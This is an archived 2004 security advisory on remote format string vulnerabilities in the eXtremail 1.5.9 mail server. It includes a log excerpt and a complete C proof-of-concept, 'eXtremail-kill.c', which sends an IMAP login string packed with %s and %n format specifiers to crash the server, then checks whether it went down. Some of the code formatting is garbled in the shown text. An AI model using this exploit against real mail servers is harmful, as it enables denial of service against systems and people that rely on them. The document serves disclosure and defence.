Remote Format String Vulnerabilities in eXtremail

2004-04-27T00:00:00
ID SECURITYVULNS:DOC:6138
Type securityvulns
Reporter Securityvulns
Modified 2004-04-27T00:00:00

Description

Package: eXtremail Auth: http://www.extremail.com/ Version(s): 1.5.9 (current release) Vulnerability: Format String

What’s eXtremail:

eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols. It includes support for virtual domains, spoofing attack ,SSL connection and Antivirus checking.

Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail, allowing remote attackers to gain root privileges. This security flaw can be exploited by supplying a specially crafted string containing format specifiers to various SMTP,POP and IMAP commands. The vulnerability has been reported to affect some previous versions (BugTraq ID: 2908), has been reintroduced in latest version of eXtremail.

Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ---------------------------------------------- 25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection - 25/04/2004 - 16:26:29 -> ---------------------------------------------- 25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150 25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received 25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received

After a successful denial of service attack, eXtremail must be restarted to regain its functionality (Smptd,Pop3d,Imapd,Remt).

Proof of Concept:

------ eXtremail-kill.c --------

/******* * Proof of Concept * eXtremail 1.5.x Denial of Service * * Luca Ercoli <luca.e [at] seeweb.com> * Seeweb http://www.seeweb.com * * *********/

include <stdio.h>

include <netdb.h>

include <sys/types.h>

include <netinet/in.h>

include <sys/socket.h>

define PORT 143

define MAXRECVSIZE 100

int main(int argc, char argv[]); void crash(char host,int TYPE);

int numbytes;

void crash(char *host,int TYPE) {

int sockfd;
char buf[MAXRECVSIZE]; struct hostent *he; struct sockaddr_in their_addr; char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";

if ((he=gethostbyname(host)) == NULL) {
perror("gethostbyname"); exit(1); }

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket"); exit(1); }

their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr = ((struct in_addr )he->h_addr); memset(&(their_addr.sin_zero), '\0', 8);

if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("connect"); exit(1); }

if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1) { perror("recv"); exit(1); }

buf[numbytes] = '\0';

if (TYPE == 0) { printf("[+] Server -> %s",buf); sleep(1); printf("\n[!] Sending malicious packet...\n");

  send&#40;sockfd,poc, strlen&#40;poc&#41;, 0&#41;;
  sleep&#40;1&#41;;
  printf &#40;&quot;&#92;n[+] Sent!&#92;n&quot;&#41;;
 }

close(sockfd);

}

int main(int argc, char *argv[]) {

printf("\n\n eXtremail 1.5.x Denial of Service \n"); printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");

if (argc != 2) {
fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]); exit(1); }

crash(argv[1],0); numbytes=0; printf ("\n[+] Checking server status ...\n");

if(!fork()) crash(argv[1],1); sleep(5); if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

return 0;

}


Solution: No solution available at the moment.

Credits:

-- Luca Ercoli <luca.e [at] seeweb.com> Seeweb http://www.seeweb.com